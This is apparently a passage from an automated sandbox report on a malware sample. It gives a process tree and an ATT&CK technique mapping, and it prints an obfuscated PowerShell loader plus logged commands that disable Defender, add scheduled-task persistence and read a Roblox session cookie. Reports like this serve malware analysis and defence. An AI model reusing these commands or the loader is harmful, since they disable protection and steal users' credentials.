ef]$DXVFlYYdgW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VFeHLeApsHTnxUBZm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mcnZdhFuVGxDDxSie,$OhxkqtpqEqyxdLaatNDEhj).Invoke($VFeHLeApsHTnxUBZm,[uint32]8,0x20,[ref]$DXVFlYYdgW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+'W'+[Char](65)+'R'+'E'+'').GetValue(''+'w'+'w'+[Char](119)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3876
- C:\Users\Admin\AppData\Roaming\XClient.exe
  C:\Users\Admin\AppData\Roaming\XClient.exe
  2⤵
  - Executes dropped EXE
  PID:2328
- C:\Users\Admin\AppData\Roaming\XClient.exe
  C:\Users\Admin\AppData\Roaming\XClient.exe
  2⤵
  PID:3528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1112

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1276
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2612

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1600

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1648

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2116

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2220

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2872

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2896

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2924

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3436

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3488
- C:\Users\Admin\AppData\Local\Temp\rootkit.exe
  "C:\Users\Admin\AppData\Local\Temp\rootkit.exe"
  2⤵
  - Checks computer location settings
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4952
- - C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
    "C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.DeadSecObbbfuscation.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1332
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:388
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /delete /f /tn "XClient"
      4⤵
      PID:1572
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB925.tmp.bat""
      4⤵
      PID:4572
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:228
- - C:\Users\Admin\AppData\Local\Temp\Modify.exe
    "C:\Users\Admin\AppData\Local\Temp\Modify.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4492
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2572
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3632
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2328
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:4400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3616
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1484
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:404
- - C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
    "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"
    3⤵
    - Executes dropped EXE
    PID:1372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3676

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3860

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4016

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4224

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2676

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2320

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3500

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3020

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2680

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5044

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:4860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery